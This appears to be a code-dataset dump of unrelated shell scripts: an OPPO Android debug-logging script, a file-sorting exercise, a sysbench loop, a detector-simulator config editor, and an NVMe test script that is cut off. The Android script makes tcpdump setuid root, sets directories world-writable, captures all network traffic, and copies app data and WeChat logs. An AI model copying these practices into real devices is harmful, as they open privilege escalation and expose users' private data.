system/xbin/tcpdump -i any -p -s 0 -W ${tcpdumpCount} -C ${tcpdumpSize} -w ${ROOT_SDCARD_netlog_LOG_PATH}/tcpdump -Z root
fi
}
function grabNetlog(){
/system/xbin/tcpdump -i any -p -s 0 -W 5 -C 10 -w /cache/admin/netlog/tcpdump.pcap -Z root
}
function LogcatFingerprint(){
countfp=1
while true
do
cat /sys/kernel/debug/tzdbg/log > ${ROOT_SDCARD_FINGERPRINTERLOG_PATH}/fingerprint_log${countfp}.txt
if [ ! -s ${ROOT_SDCARD_FINGERPRINTERLOG_PATH}/fingerprint_log${countfp}.txt ];then
rm ${ROOT_SDCARD_FINGERPRINTERLOG_PATH}/fingerprint_log${countfp}.txt;
fi
((countfp++))
sleep 1
done
}
function LogcatFingerprintQsee(){
countqsee=1
while true
do
cat /sys/kernel/debug/tzdbg/qsee_log > ${ROOT_SDCARD_FINGERPRINTERLOG_PATH}/qsee_log${countqsee}.txt
if [ ! -s ${ROOT_SDCARD_FINGERPRINTERLOG_PATH}/qsee_log${countqsee}.txt ];then
rm ${ROOT_SDCARD_FINGERPRINTERLOG_PATH}/qsee_log${countqsee}.txt;
fi
((countqsee++))
sleep 1
done
}
function screen_record(){
ROOT_SDCARD_RECORD_LOG_PATH=${ROOT_AUTOTRIGGER_PATH}/screen_record
mkdir -p ${ROOT_SDCARD_RECORD_LOG_PATH}
/system/bin/screenrecord --time-limit 1800 --verbose ${ROOT_SDCARD_RECORD_LOG_PATH}/screen_record.mp4
}
function Dmesg(){
mkdir -p $ROOT_TRIGGER_PATH/${CURTIME}
dmesg > $ROOT_TRIGGER_PATH/${CURTIME}/dmesg.txt;
}
function Dumpsys(){
mkdir -p $ROOT_TRIGGER_PATH/${CURTIME}_dumpsys
dumpsys > $ROOT_TRIGGER_PATH/${CURTIME}_dumpsys/dumpsys.txt;
}
function Dumpstate(){
mkdir -p $ROOT_TRIGGER_PATH/${CURTIME}_dumpstate
dumpstate > $ROOT_TRIGGER_PATH/${CURTIME}_dumpstate/dumpstate.txt
}
function Top(){
mkdir -p $ROOT_TRIGGER_PATH/${CURTIME}_top
top -n 1 > $ROOT_TRIGGER_PATH/${CURTIME}_top/top.txt;
}
function Ps(){
mkdir -p $ROOT_TRIGGER_PATH/${CURTIME}_ps
ps > $ROOT_TRIGGER_PATH/${CURTIME}_ps/ps.txt;
}
function Server(){
mkdir -p $ROOT_TRIGGER_PATH/${CURTIME}_servelist
service list > $ROOT_TRIGGER_PATH/${CURTIME}_servelist/serviceList.txt;
}
function DumpEnvironment(){
rm -rf /cache/environment
umask 000
mkdir -p /cache/environment
ps > /cache/environment/ps.txt &
mount > /cache/environment/mount.txt &
getprop > /cache/environment/prop.txt &
/system/bin/dmesg > /cache/environment/dmesg.txt &
/system/bin/logcat -d -v threadtime > /cache/environment/android.txt &
/system/bin/logcat -b radio -d -v threadtime > /cache/environment/radio.txt &
/system/bin/logcat -b events -d -v threadtime > /cache/environment/events.txt &
i=`ps | grep system_server | $XKIT awk '{printf $2}'`
ls /proc/$i/fd -al > /cache/environment/system_server_fd.txt &
ps -t $i > /cache/environment/system_server_thread.txt &
cp -rf /data/system/packages.xml /cache/environment/packages.xml
chmod +r /cache/environment/packages.xml
cat /proc/meminfo > /cache/environment/proc_meminfo.txt &
cat /d/ion/heaps/system > /cache/environment/iom_system_heaps.txt &
wait
setprop sys.dumpenvironment.finished 1
umask 077
}
function CleanAll(){
rm -rf /cache/admin
rm -rf /sdcard/oppo_log/*-*
rm -rf /sdcard/oppo_log/log_history.txt
rm -rf /sdcard/oppo_log/*.hprof
rm -rf /sdcard/oppo_log/*.gz
rm -rf /sdcard/oppo_log/xlog
rm -rf /data/oppo_log/*
rm -rf /data/anr/*
rm -rf /data/tombstones/*
rm -rf /data/system/dropbox/*
#can not delete the junk_logs path, kernel needed
mkdir -p /data/oppo_log/junk_logs/kernel
mkdir -p /data/oppo_log/junk_logs/ftrace
mkdir -p /data/oppo_log/junk_logs
chmod -R 777 /data/oppo_log/junk_logs
}
function tranfer(){
mkdir -p /sdcard/oppo_log
mkdir -p /sdcard/oppo_log/compress_log
chmod -R 777 /data/oppo_log/*
cat /data/oppo_log/log_history.txt >> /sdcard/oppo_log/log_history.txt
mv /data/oppo_log/transfer_list.txt /sdcard/oppo_log/transfer_list.txt
rm -rf /data/oppo_log/log_history.txt
mv /data/oppo_log/* /data/media/0/oppo_log/
mv -f /sdcard/tencent/MicroMsg/xlog /sdcard/oppo_log/
chcon -R u:object_r:media_rw_data_file:s0 /data/media/0/oppo_log/
setprop sys.tranfer.finished 1
#can not delete the junk_logs path, kernel needed
mkdir -p /data/oppo_log/junk_logs/kernel
mkdir -p /data/oppo_log/junk_logs/ftrace
mkdir -p /data/oppo_log/junk_logs
chmod -R 777 /data/oppo_log/junk_logs
}
function clearCurrentLog(){
filelist=`cat /sdcard/oppo_log/transfer_list.txt | $XKIT awk '{print $1}'`
for i in $filelist;do
rm -rf /sdcard/oppo_log/$i
done
rm -rf /sdcard/oppo_log/screenshot
rm -rf /sdcard/oppo_log/diag_logs
rm -rf /sdcard/oppo_log/transfer_list.txt
rm -rf /sdcard/oppo_log/description.txt
rm -rf /sdcard/oppo_log/xlog
}
function moveScreenRecord(){
fileName=`getprop sys.screenrecord.name`
zip=.zip
mp4=.mp4
mv -f /data/media/0/oppo_log/${fileName}${zip} /data/media/0/oppo_log/compress_log/${fileName}${zip}
mv -f /data/media/0/oppo_log/screen_record/screen_record.mp4 /data/media/0/oppo_log/compress_log/${fileName}${mp4}
}
function clearDataOppoLog(){
rm -rf /data/oppo_log/*
rm -rf /sdcard/oppo_log/diag_logs/[0-9]*
setprop sys.clear.finished 1
}
function calculateLogSize(){
LogSize1=0
LogSize2=0
if [ -d "${DATA_LOG_PATH}" ]; then
LogSize1=`du -s -k ${DATA_LOG_PATH} | $XKIT awk '{print $1}'`
fi
if [ -d /sdcard/oppo_log/diag_logs ]; then
LogSize2=`du -s -k /sdcard/oppo_log/diag_logs | $XKIT awk '{print $1}'`
fi
LogSize3=`expr $LogSize1 + $LogSize2`
setprop sys.calcute.logsize ${LogSize3}
setprop sys.calcute.finished 1
}
function tranferTombstone() {
srcpath=`getprop sys.tombstone.file`
subPath=`getprop com.oppo.debug.time`
TOMBSTONE_TIME=`date +%F-%H-%M-%S`
cp ${srcpath} /data/oppo_log/${subPath}/tombstone/tomb_${TOMBSTONE_TIME}
}
function tranferAnr() {
srcpath=`getprop sys.anr.srcfile`
subPath=`getprop com.oppo.debug.time`
destfile=`getprop sys.anr.destfile`
cp ${srcpath} /data/oppo_log/${subPath}/anr/${destfile}
}
function cppstore() {
panicenable=`getprop persist.sys.assert.panic`
argtrue='true'
srcpstore=`ls /sys/fs/pstore`
subPath=`getprop com.oppo.debug.time`
if [ "${panicenable}" = "${argtrue}" ]; then
if [ "${srcpstore}" != "" ]; then
cp -r /sys/fs/pstore /data/oppo_log/${subPath}/pstore
fi
fi
}
function enabletcpdump(){
mount -o rw,remount,barrier=1 /system
chmod 6755 /system/xbin/tcpdump
mount -o ro,remount,barrier=1 /system
}
#ifdef VENDOR_EDIT
#Yanzhen.Feng@Swdp.Android.OppoDebug.LayerDump, 2015/12/09, Add for SurfaceFlinger Layer dump
function layerdump(){
mkdir -p ${ROOT_AUTOTRIGGER_PATH}
LOGTIME=`date +%F-%H-%M-%S`
ROOT_SDCARD_LAYERDUMP_PATH=${ROOT_AUTOTRIGGER_PATH}/LayerDump_${LOGTIME}
cp -R /data/log ${ROOT_SDCARD_LAYERDUMP_PATH}
rm -rf /data/log
}
#endif /* VENDOR_EDIT */
function junklogcat() {
# echo 1 > sdcard/0.txt
JUNKLOGPATH=/sdcard/oppo_log/junk_logs
mkdir -p ${JUNKLOGPATH}
# echo 1 > sdcard/1.txt
# echo 1 > ${JUNKLOGPATH}/1.txt
system/bin/logcat -f ${JUNKLOGPATH}/junklogcat.txt -v threadtime *:V
}
function junkdmesg() {
JUNKLOGPATH=/sdcard/oppo_log/junk_logs
mkdir -p ${JUNKLOGPATH}
system/bin/dmesg > ${JUNKLOGPATH}/junkdmesg.txt
}
function junksystrace_start() {
JUNKLOGPATH=/sdcard/oppo_log/junk_logs
mkdir -p ${JUNKLOGPATH}
# echo s_start > sdcard/s_start1.txt
#setup
setprop debug.atrace.tags.enableflags 0x86E
# stop;start
adb shell "echo 16384 > /sys/kernel/debug/tracing/buffer_size_kb"
echo nop > /sys/kernel/debug/tracing/current_tracer
echo 'sched_switch sched_wakeup sched_wakeup_new sched_migrate_task binder workqueue irq cpu_frequency mtk_events' > /sys/kernel/debug/tracing/set_event
#just in case tracing_enabled is disabled by user or other debugging tool
echo 1 > /sys/kernel/debug/tracing/tracing_enabled >nul 2>&1
echo 0 > /sys/kernel/debug/tracing/tracing_on
#erase previous recorded trace
echo > /sys/kernel/debug/tracing/trace
echo press any key to start capturing...
echo 1 > /sys/kernel/debug/tracing/tracing_on
echo "Start recordng ftrace data"
echo s_start > sdcard/s_start2.txt
}
function junksystrace_stop() {
JUNKLOGPATH=/sdcard/oppo_log/junk_logs
mkdir -p ${JUNKLOGPATH}
echo s_stop > sdcard/s_stop.txt
echo 0 > /sys/kernel/debug/tracing/tracing_on
echo "Recording stopped..."
cp /sys/kernel/debug/tracing/trace ${JUNKLOGPATH}/junksystrace
echo 1 > /sys/kernel/debug/tracing/tracing_on
}
#ifdef VENDOR_EDIT
#Zhihao.Li@MultiMedia.AudioServer.FrameWork, 2016/10/19, Add for clean pcm dump file.
function cleanpcmdump() {
rm -rf /sdcard/oppo_log/pcm_dump/*
}
#endif /* VENDOR_EDIT */
#ifdef VENDOR_EDIT
#Jianping.Zheng@Swdp.Android.Stability.Crash, 2016/08/09, Add for logd memory leak workaround
function check_logd_memleak() {
logd_mem=`ps | grep -i /system/bin/logd | $XKIT awk '{print $5}'`
#echo "logd_mem:"$logd_mem
if [ "$logd_mem" != "" ]; then
upper_limit=300000;
if [ $logd_mem -gt $upper_limit ]; then
#echo "logd_mem great than $upper_limit, restart logd"
setprop persist.sys.assert.panic false
setprop ctl.stop logcatsdcard
setprop ctl.stop logcatradio
setprop ctl.stop logcatevent
setprop ctl.stop logcatkernel
setprop ctl.stop tcpdumplog
setprop ctl.stop fingerprintlog
setprop ctl.stop fplogqess
sleep 2
setprop ctl.restart logd
sleep 2
setprop persist.sys.assert.panic true
fi
fi
}
#endif /* VENDOR_EDIT */
case "$config" in
"ps")
Preprocess
Ps
;;
"top")
Preprocess
Top
;;
"server")
Preprocess
Server
;;
"dump")
Preprocess
Dumpsys
;;
"tranfer")
Preprocess
tranfer
;;
"tranfer_tombstone")
tranferTombstone
;;
"logcache")
CacheLog
;;
"logpreprocess")
PreprocessLog
;;
"tranfer_anr")
tranferAnr
;;
"main")
initLogPath
Logcat
;;
"radio")
initLogPath
LogcatRadio
;;
"fingerprint")
initLogPath
LogcatFingerprint
;;
"fpqess")
initLogPath
LogcatFingerprintQsee
;;
"event")
initLogPath
LogcatEvent
;;
"kernel")
initLogPath
LogcatKernel
;;
"tcpdump")
initLogPath
enabletcpdump
tcpdumpLog
;;
"clean")
CleanAll
;;
"clearcurrentlog")
clearCurrentLog
;;
"calcutelogsize")
calculateLogSize
;;
"cleardataoppolog")
clearDataOppoLog
;;
"movescreenrecord")
moveScreenRecord
;;
"cppstore")
initLogPath
cppstore
;;
"screen_record")
initLogPath
screen_record
;;
#ifdef VENDOR_EDIT
#Yanzhen.Feng@Swdp.Android.OppoDebug.LayerDump, 2015/12/09, Add for SurfaceFlinger Layer dump
"layerdump")
layerdump
;;
#endif /* VENDOR_EDIT */
"dumpstate")
Preprocess
Dumpstate
;;
"enabletcpdump")
enabletcpdump
;;
"dumpenvironment")
DumpEnvironment
;;
"initcache")
initcache
;;
"logcatcache")
logcatcache
;;
"radiocache")
radiocache
;;
"eventcache")
eventcache
;;
"kernelcache")
kernelcache
;;
"tcpdumpcache")
tcpdumpcache
;;
"fingerprintcache")
fingerprintcache
;;
"fplogcache")
fplogcache
;;
"log_observer")
log_observer
;;
"junklogcat")
junklogcat
;;
"junkdmesg")
junkdmesg
;;
"junkststart")
junksystrace_start
;;
"junkststop")
junksystrace_stop
;;
#ifdef VENDOR_EDIT
#Zhihao.Li@MultiMedia.AudioServer.FrameWork, 2016/10/19, Add for clean pcm dump file.
"cleanpcmdump")
cleanpcmdump
;;
#endif /* VENDOR_EDIT */
#ifdef VENDOR_EDIT
#Jianping.Zheng@Swdp.Android.Stability.Crash, 2016/08/09, Add for logd memory leak workaround
"check_logd_memleak")
check_logd_memleak
;;
#endif /* VENDOR_EDIT *
*)
tranfer
;;
esac
| true |
f545f058392b8cfd98d494ab9e29d79cf5c17761 | Shell | xMonny/Operating_systems_course | /Exercise-shell/05-b-9100.sh | UTF-8 | 1,035 | 3.984375 | 4 | [] | no_license | #!/bin/bash
if [ "$#" -ne 2 ]; then
echo "Invalid number of arguments"
exit 1
fi
SOURCE="${1}"
DESTINATION="${2}"
if ! [ -d "${SOURCE}" ]; then
echo "Invalid name of source directory"
exit 2
fi
if ! [ -d "${DESTINATION}" ]; then
echo "Invalid name of destination directory"
exit 3
fi
if ! [ -r "${SOURCE}" ]; then
echo "Source directory doesn't have read permissions"
exit 4
fi
if ! [ -r "${DESTINATION}" ]; then
echo "Destination directory doesn't have read permissions"
exit 5
fi
if ! [ -w "${DESTINATION}" ]; then
echo "Destination directory doesn't have write permissions"
exit 6
fi
while read -d $'\0' file
do
BASE_NAME=$(basename "${file}")
EXTENSION=$(echo "${BASE_NAME}" | egrep "^[^\.]+\.[^\.]+$" | cut -d '.' -f2)
find "${DESTINATION}" -mindepth 1 -maxdepth 1 -type d 2>/dev/null | grep -q "^${EXTENSION}$"
if [ "$?" -ne 0 ]; then
mkdir "${DESTINATION}"/"${EXTENSION}" 2>/dev/null
fi
cp "${file}" "${DESTINATION}"/"${EXTENSION}" 2>/dev/null
done< <(find "${SOURCE}" -type f -print0 2>/dev/null)
| true |
3078566e21e2ad0e30830d8f3d09ba66ce85b49a | Shell | Vahel123/Abschlussarbeit | /DataAnalyze/KomponnentenTest/Benchmark/DockerContainer/CPU_Test/Benchmark_CPU_Test.sh | UTF-8 | 423 | 3.015625 | 3 | [] | no_license | #/bash/bin!
# Benchmark-CPU
# docker exec -it 2da8db12b3a7 sysbench --num-threads=1 --test=cpu --cpu-max-prime=20000 run && timeout 30 bash -c -- 'while true; do cat /proc/stat | head -n1 >> CPU_Test_fuer_Docker_Container_1.csv ;done'
i=1
while [ $i -le 25 ]
do
sysbench --num-threads=1 --test=cpu --cpu-max-prime=20000 run | head -n15 | tail -n1 >> CPU_Test_fuer_Docker_Container.csv
sleep 30s
i=`expr $i + 1`
done
| true |
52ad46ef02c162507f5926ead224fb40f193b055 | Shell | pmh905001/scripts | /detector-simulator/config-detsim.sh | UTF-8 | 4,908 | 3.28125 | 3 | [] | no_license | #! /bin/bash
#This script is used to update the detector simulator.
#Usage: config-detsim.sh detectorIP broadcastIP
#For example : config-detsim.sh 3.136.143.68 3.136.143.255
if [ $# != 2 ]
then
echo -e "\e[1;31m Need 2 parameters \e[0m"
echo Usage:
echo $0 \<detectorIP\> \<broadcastIP\>
exit 1
fi
#path1="ConnectionPoint.cfg"
#path2="XRImDet.dyn"
#path3="start.applications"
#path4="kilall"
#path5="VersionInfo.txt"
path1="/magichome/xruser/config/IDC/Application/ConnectionPoint.cfg"
path2="/magichome/xruser/config/XRImDet.dyn"
path3="/magichome/xruser/bin/start.magic"
path4="/magichome/xruser/bin/kilall"
path5="/magichome/xruser/install/detector_fw/iDR/VersionInfo.txt"
existStr=`grep -c 'iDR:' $path1`
if [ $existStr == 1 ]
then
numberIDR=`grep 'iDR:' $path1 -n | awk -F: '{print $1}'`
let num=numberIDR+8
echo $path1 : $num
#Just print the changed line
#sed -n "${num}s/DetectorIP.*/DetectorIP = \"$1\";/pg" $path1
sed -i "${num}s/DetectorIP.*/DetectorIP = \"$1\";/g" $path1
let num=num+1
echo $path1 : $num
#sed -n "${num}s/Detector_SysIP.*/Detector_SysIP = \"$1\";/pg" $path1
sed -i "${num}s/Detector_SysIP.*/Detector_SysIP = \"$1\";/g" $path1
let num=num+1
echo $path1 : $num
#sed -n "${num}s/BroadcastAddress.*/BroadcastAddress = \"$2\";/pg" $path1
sed -i "${num}s/BroadcastAddress.*/BroadcastAddress = \"$2\";/g" $path1
dos2unix $path1
else
echo -e "\e[1;31m Not exist key word in $path1 \e[0m"
fi
# In XRImDet.dyn, switch DetectorConnectionStrategy from 1 to 0 on the line
# 7 rows below the single [CP_WIFI_1] section header.
existStr=`grep -c '\[CP_WIFI_1\]' $path2`
if [ $existStr == 1 ]
then
numberIDR=`grep '\[CP_WIFI_1\]' $path2 -n | awk -F: '{print $1}'`
let num=numberIDR+7
echo $path2 : $num
#sed -n "${num}s/DetectorConnectionStrategy.Val = 1/DetectorConnectionStrategy.Val = 0/pg" $path2
sed -i "${num}s/DetectorConnectionStrategy.Val = 1/DetectorConnectionStrategy.Val = 0/g" $path2
else
echo -e "\e[1;31m Not exist key word in $path2 \e[0m"
fi
# Append the simulator start command to start.magic, but only once
# (grep -c == 0 keeps this idempotent across repeated runs).
existStr=`grep -c 'sudo /magichome/xruser/detsim/bin/tablesim_iDR.sh' $path3`
if [ $existStr == 0 ]
then
echo "$path3 : "
#sed -n "$ a sudo /magichome/xruser/detsim/bin/tablesim_iDR.sh" $path3
sed -i "$ a sudo /magichome/xruser/detsim/bin/tablesim_iDR.sh" $path3
else
echo -e "\e[1;31m Already exist key word in $path3 \e[0m"
fi
# Likewise append the simulator kill command to the kilall script, once.
existStr=`grep -c 'sudo /magichome/xruser/detsim/bin/kildetsim.sh' $path4`
if [ $existStr == 0 ]
then
echo "$path4 : "
#sed -n "$ a sudo /magichome/xruser/detsim/bin/kildetsim.sh" $path4
sed -i "$ a sudo /magichome/xruser/detsim/bin/kildetsim.sh" $path4
else
echo -e "\e[1;31m already exist key word in $path4 \e[0m"
fi
#256f0612
# Force the firmware version marker: replace line 1 of VersionInfo.txt
# with the literal string 256f0612 unless it is already present.
existStr=`grep -c '256f0612' $path5`
if [ $existStr == 0 ]
then
echo "$path5 : "
sed -i "1 c 256f0612" $path5
else
echo -e "\e[1;31m Already existed key word in $path5 \e[0m"
fi
#Restart App
#Kilall;start.magic
#when you see detector boots up successfully, execute this command:
#/magichome/xruser/bin/copyiDRCalFiles.sh
##############################################################################################
#Description
##############################################################################################
#Open a terminal
#su //to change to superuser
#service ip
# vi /magichome/xruser/config/IDC/Application/ConnectionPoint.cfg
#Scroll to the bottom,
#Update IP of detector, like below:
#iDR:
#{
# eth0:
# {
# DetectorPanelId = "UNKNOWN";
# DetectorType = "UNKNOWN";
# Detector_HostPort = 5550;
# Detector_ImagePort = 6660;
# DetectorIP = "3.136.143.17"; #change to real eth1 ip and bcast
# Detector_SysIP = "3.136.143.17";
# BroadcastAddress = "3.136.143.255";
# BroadcastPort = 8100;
# BroadcastInterval = 2;
# BroadcastTimeout = 20;
# SystemPort = 4500;
# EthernetInterface = "eth0";
# };
#};
# vi /magichome/xruser/config/XRImDet.dyn
#Update CP_WIFI_1, like below:
#[CP_WIFI_1]
#DetcommMedium.Type = String
#DetcommMedium.Val = eth0
#PowerSupplyInfo.Type = String
#PowerSupplyInfo.Val = DCRegulated
#DetectorConnectionStrategy.Type = Number
#DetectorConnectionStrategy.Val = 0 #change from 1 to 0
#DetectorConnectionType.Type = String
#DetectorConnectionType.Val = CONNECT_WIFI
#SupportedDetectorTypes.Type = StringList
#SupportedDetectorTypes.Val = { iDR }
# vi /magichome/xruser/bin/start.magic
#Add these to the end:
#to start detsim
#sudo /magichome/xruser/detsim/bin/tablesim_iDR.sh
# vi /magichome/xruser/bin/kilall
#Add these to the end:
#to kill detsim
#sudo /magichome/xruser/detsim/bin/kildetsim.sh
# vi /magichome/xruser/install/detector_fw/iDR/VersionInfo.txt
#Change the content to 256f0612
# Restart App
#Kilall;start.magic
# when you see detector boots up successfully, execute this command:
#/magichome/xruser/bin/copyiDRCalFiles.sh
| true |
4b8393a0508fde57dd167891d2f56195f4f393c9 | Shell | Aminuxer/PS-RedSystem-Linux | /Backups/backup.sh | UTF-8 | 896 | 3.25 | 3 | [] | no_license | #!/bin/bash
# Nightly backup for PayTerm1: archive home dirs and key /etc files into a
# dated folder under $dir_open, checksum them, and prune old backup days.
date=$(date "+%Y_%m_%d")  # current date, used as the backup folder name
days_store='12'           # Number of backups (N last days)
dir_open=/Backups/Data    # directory for store backups
# Tar options kept as an array: with the previous string form the shell
# preserved the literal quote characters in --label="PayTerm1" when the
# variable was expanded unquoted, so tar recorded a label with quotes in it.
tgz_bin=(tar --acls -p --xattrs --label=PayTerm1 --gzip -cf)

echo "=== BackUp script for PayTerm1 === [$date] "
mkdir "$dir_open/$date"
sync
echo 'Make open archives ...'
# Abort if the dated directory is unusable instead of archiving into the
# wrong working directory.
cd "$dir_open/$date" || exit 1
"${tgz_bin[@]}" PT1_home.tgz /home/terminal /home/backuper /root
"${tgz_bin[@]}" PT1_etc.tgz /etc/sysconfig/iptables* /var/spool/cron /etc/ssh /etc/rc.d/rc.local /etc/passwd /etc/group /etc/X11
cd "$dir_open/$date" && sha256sum * > _WPT1.sha256
sync
cd /
echo 'Delete old backups ...'
# Keep backups for the last N days only (-delete implies depth-first, so
# files go before their directories).
find "$dir_open/" -mtime +"$days_store" -delete
echo "=== BackUp script complete ===== [$date]"
sync
sleep 5
cp /Backups/backup.log "$dir_open/$date"
| true |
de028e712b0f00ce87b886af5cc1821d64e6f19b | Shell | luyong6/snap | /actions/hdl_nvme_example/tests/test_0x10140001.sh | UTF-8 | 8,224 | 3.59375 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
#
# Copyright 2017 International Business Machines
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Defaults; each can be overridden by the getopts loop below.
card=0
version=0.3
reset=0
threads=1
nblocks=2
prefetch=0
random_seed=0
duration="NONE"
# Default LBA count passed to snap_cblk (per usage: 0x40000 is 1 GiB).
options="-n 0x40000"
TEST="NONE"
# output formatting
bold=$(tput bold)
normal=$(tput sgr0)
# Make the freshly built tools and libraries visible to this shell.
export PATH=.:`pwd`/actions/hdl_nvme_example/sw:`pwd`/software/tools:${PATH}
export LD_LIBRARY_PATH=.:`pwd`/actions/hdl_nvme_example/sw:`pwd`/software/lib:${LD_LIBRARY_PATH}
# Print command-line help to stdout.
# NOTE(review): $PROGRAM is not set anywhere in this file — presumably it
# should be $0; confirm before relying on the printed name.
function usage() {
echo "Usage: $PROGRAM"
echo " [-V] print version"
echo " [-h|-?] help"
echo " [-C <0..3>] card number"
echo " [-d SHORT/NORMAL/LONG] duration of tests"
echo " [-r] card reset (sudo needed)"
echo " [-n <lbas>] number of lbas to try, e.g. 0x40000 for 1 GiB"
echo " [-b <nblocks>] number of blocks per transfer"
echo " [-t <threads>] threads to be used"
echo " [-H <threads>] hardware threads per CPU to be used (see ppc64_cpu)"
echo " [-p <prefetch>] 0/1 disable/enable prefetching"
echo " [-R <seed>] random seed, if not 0, random read odering"
echo " [-T <testcase>] testcase e.g. NONE, CBLK, READ_BENCHMARK, PERF, READ_WRITE ..."
echo
echo " Perform SNAP card initialization and action_type "
echo " detection. Initialize NVMe disk 0 and 1 if existent."
echo
}
# Reset CAPI card $card via sysfs, wait ~20 s for it to come back, and
# verify that its AFU device node reappeared; exits 1 on failure.
function reset_card() {
echo -n "Resetting card ${card} (takes a while) "
# Raise the EEH freeze limit so repeated resets do not fence the slot.
sudo bash -c "echo 100000 > /sys/kernel/debug/powerpc/eeh_max_freezes"
sudo bash -c "echo 1 > /sys/class/cxl/card${card}/reset"
# Progress dots while the card re-initializes.
for ((i=0;i<20;i++)); do
sleep 1
echo -n "."
done
echo " OK"
echo -n "Check if card reappeared ... "
ls -l /dev/cxl/afu${card}.0 > /dev/null
if [ $? -ne 0 ]; then
echo "recovery failed, sorry!"
exit 1;
else
echo "OK"
fi
}
# Parse command-line options; defaults were assigned above.
while getopts ":H:A:b:C:d:T:t:R:n:p:rVvh" opt; do
case ${opt} in
C)
card=${OPTARG};
# NOTE(review): an out-of-range card prints usage but does not exit.
if [[ $card -gt 3 ]]; then
echo "Invalid option for -C -$OPTARG" >&2
usage
fi
;;
V)
echo "${version}" >&2
exit 0
;;
T)
TEST=${OPTARG}
;;
b)
nblocks=${OPTARG}
;;
t)
threads=${OPTARG}
;;
H)
# Change the host SMT mode, then display the resulting setting.
hw_threads=${OPTARG}
sudo ppc64_cpu --smt=${hw_threads}
ppc64_cpu --smt
;;
d)
# Selecting a duration implies the read benchmark test case.
duration=${OPTARG}
TEST="READ_BENCHMARK"
;;
n)
options="-n ${OPTARG}"
;;
R)
random_seed=${OPTARG}
;;
p)
prefetch=${OPTARG}
;;
r)
reset=1;
;;
h)
usage;
exit 0;
;;
\?)
printf "${bold}ERROR:${normal} Invalid option: -${OPTARG}\n" >&2
exit 1
;;
:)
printf "${bold}ERROR:${normal} Option -$OPTARG requires an argument.\n" >&2
exit 1
;;
esac
done
shift $((OPTIND-1))
# now do something with $@
# Only the exit status of 'which' matters here.
# NOTE(review): '2>&1 > /dev/null' redirects stderr to the terminal and
# stdout to /dev/null (order matters); '> /dev/null 2>&1' was likely meant.
which snap_maint 2>&1 > /dev/null
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} Path not pointing to required binaries (snap_maint, snap_nvme_init)!\n" >&2
exit 1
fi
# Optional card reset requested via -r.
if [ $reset -eq 1 ]; then
reset_card
fi
# Initialize the card and both NVMe drives before any test case runs.
snap_maint -C${card} -v
snap_nvme_init -C${card} -d0 -d1 -v
# Sweep read performance over strategy x prefetch x thread-count and print
# timings; aborts the whole script on the first failing snap_cblk run.
function nvme_read_benchmark () {
echo "SNAP NVME READ BENCHMARK"
for s in UP DOWN UPDOWN ; do
for p in 0 1 4 8 ; do
for t in 1 2 4 8 10 14 16 32 ; do
echo "PREFETCH: $p ; THREADS: $t ; NBLOCKS=${nblocks} ; STRATEGY=${s}" ;
# Subshell so 'time' covers the whole run with per-run environment.
(time CBLK_PREFETCH=$p CBLK_STRATEGY=${s} \
snap_cblk -C0 ${options} -b${nblocks} \
-R${random_seed} -s0 -t${t} \
--read /dev/null );
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} bad exit code!\n" >&2
exit 1
fi
echo
done
done
done
}
# Same parameter sweep as the read benchmark, but exercising the combined
# read/write mode (--rw); aborts on the first failure.
function cblk_read_write () {
echo "SNAP NVME READ WRITE"
for s in UP DOWN UPDOWN ; do
for p in 0 1 4 8 ; do
for t in 1 2 4 8 10 14 16 32 ; do
echo "PREFETCH: $p ; THREADS: $t ; NBLOCKS=${nblocks} ; STRATEGY=${s}" ;
(time CBLK_PREFETCH=$p CBLK_STRATEGY=${s} \
snap_cblk -C0 ${options} -b${nblocks} \
-R${random_seed} -s0 -t${t} \
--rw /dev/null );
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} bad exit code!\n" >&2
exit 1
fi
echo
done
done
done
}
# Record system-wide perf profiles for a smaller prefetch/thread sweep and
# write one 'perf report' text file per combination.
function perf_test () {
echo "SNAP NVME PERF BENCHMARK"
for p in 0 4 ; do
for t in 1 8 16 32 ; do
perf_log="snap_nvme_prefetch_${p}_threads_${t}.log"
echo "PREFETCH: $p ; THREADS: $t ; NBLOCKS=${nblocks}" ;
# -a: whole system, -g: call graphs; -E keeps the caller's environment.
sudo -E -- perf record -a -g -- \
CBLK_PREFETCH=$p \
snap_cblk -C0 ${options} -b${nblocks} \
-R${random_seed} -s0 -t${t} \
--read /dev/null ;
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} bad exit code!\n" >&2
exit 1
fi
echo
echo -n "Generating perf output ${perf_log} ... "
sudo perf report -f > $perf_log
echo "OK"
done
done
}
function cblk_test () {
export CBLK_PREFETCH=${prefetch}
for nblocks in 1 2 ; do
echo "### (1.${nblocks}) Formatting using ${nblocks} block increasing pattern ..."
snap_cblk -C${card} ${options} -t${threads} -b${nblocks} --format --pattern ${nblocks}
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} Cannot format NVMe device!\n" >&2
exit 1
fi
echo "# Reading using 32 blocks ..."
snap_cblk -C${card} ${options} -t${threads} -b32 --read cblk_read.bin
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} Reading NVMe device!\n" >&2
exit 1
fi
printf "${bold}NOTE:${normal} Please manually inspect if pattern is really ${nblocks}\n"
hexdump cblk_read.bin
echo
done
echo "### (2) Formatting using 2 blocks increasing pattern ..."
snap_cblk -C${card} ${options} -t${threads} -b2 --format --pattern INC
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} Cannot format NVMe device!\n" >&2
exit 1
fi
echo "# Reading using 1 block ..."
snap_cblk -C${card} ${options} -t${threads} -b1 --read cblk_read1.bin
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} Reading NVMe device!\n" >&2
exit 1
fi
echo "# Reading using 2 blocks ..."
snap_cblk -C${card} ${options} -t${threads} -b2 --read cblk_read2.bin
if [ $? -ne 0 ]; then
printf "${bold}ERROR:${normal} Reading NVMe device!\n" >&2
exit 1
fi
echo "Compare results ..."
diff cblk_read1.bin cblk_read2.bin
if [ $? -ne 0 ]; then
